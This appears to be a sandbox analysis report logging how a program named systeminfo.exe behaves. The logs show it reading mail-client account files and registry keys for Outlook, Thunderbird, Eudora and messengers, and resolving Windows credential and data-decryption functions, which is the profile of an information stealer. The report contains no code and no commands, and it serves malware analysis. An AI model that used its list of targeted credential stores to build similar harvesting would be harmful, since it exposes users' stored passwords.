| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount | type = size |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount | size = 1506, size_out = 1506 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount | size = 670, size_out = 670 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount | size = 1734, size_out = 1734 |
|
1 | |
| Write | C:\ProgramData\FB2F.tmp | size = 11 |
|
1 | |
| Write | C:\ProgramData\FB2F.tmp | size = 1 |
|
12 | |
| Write | C:\ProgramData\FB2F.tmp | size = 12 |
|
1 | |
| Write | C:\ProgramData\FB2F.tmp | size = 14 |
|
2 | |
| Write | C:\ProgramData\FB2F.tmp | size = 5 |
|
1 | |
| Write | C:\ProgramData\FB2F.tmp | size = 0 |
|
4 | |
| Write | C:\ProgramData\FB2F.tmp | size = 2 |
|
2 | |
| Write | C:\ProgramData\FB2F.tmp | size = 4 |
|
2 | |
| Write | C:\ProgramData\FB2F.tmp | size = 7 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\IncrediMail\Identities | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Group Mail | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\MessengerService | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Yahoo\Pager | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} | value_name = Username, data = Main Identity, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTP User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 User, data = sdjwh@dive.djh, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Server, data = fgerh, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Display Name, data = fvmmeu dufn, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Email, data = sdjwh@dive.djh, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Server, data = hthr, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Use SPA, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Password, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP User, data = 104, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles | - |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x742f0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75c50000 |
|
1 | |
| Load | pstorec.dll | base_address = 0x74150000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x758d0000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x756e0000 |
|
3 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | function = InitCommonControlsEx, address_out = 0x743109ce |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x75e9fb26 |
|
1 | |
| Get Address | c:\windows\syswow64\pstorec.dll | function = PStoreCreateInstance, address_out = 0x7415526c |
|
1 | |
| Get Address | c:\windows\syswow64\crypt32.dll | function = CryptUnprotectData, address_out = 0x75905a7f |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredReadA, address_out = 0x757271c1 |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredFree, address_out = 0x756eb2ec |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredDeleteA, address_out = 0x75727941 |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateA, address_out = 0x75727381 |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateW, address_out = 0x75727481 |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:49, Reason: Autostart |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:34 |
| Information | Value |
|---|---|
| PID | 0x5d8 |
| Parent PID | 0x4ec (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5DC
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x00081fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0009dfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000adfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x0016ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
|
| systeminfo.exe | 0x003d0000 | 0x003eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x00577fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005c0000 | 0x005c0000 | 0x0063ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000810000 | 0x00810000 | 0x0090ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01d10000 | 0x01fdefff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000001fe0000 | 0x01fe0000 | 0x020befff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000020c0000 | 0x020c0000 | 0x02490fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
|
| uxtheme.dll | 0x73480000 | 0x734fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x73640000 | 0x73690fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winmm.dll | 0x736a0000 | 0x736d1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msacm32.dll | 0x736e0000 | 0x736f3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73700000 | 0x73707fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73710000 | 0x7376bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x73770000 | 0x737aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74b20000 | 0x74b2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74b30000 | 0x74b8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x74b90000 | 0x74be6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x74d90000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x74e30000 | 0x74f3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x74f90000 | 0x7502cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75030000 | 0x75039fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75040000 | 0x7513ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x75140000 | 0x7519ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x751c0000 | 0x7531bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x75f70000 | 0x7605ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76370000 | 0x7643bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76440000 | 0x764cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x764d0000 | 0x7655ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76700000 | 0x76745fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x76b00000 | 0x76babfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x76bb0000 | 0x76bc8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076bd0000 | 0x76bd0000 | 0x76cc9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76df0000 | 0x76f98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76fd0000 | 0x7714ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x76b00000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x74e30000 |
|
2 | |
| Load | USER32.dll | base_address = 0x75040000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74d90000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | base_address = 0x3d0000 |
|
1 | |
| Get Filename | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 259 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34faac |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34fae4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x34fb54 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x34fb54 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x34fb54 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34fb54 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x34fb54 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = strchr, address_out = 0x76b0dbeb |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x76b09894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x76b09cee |
|
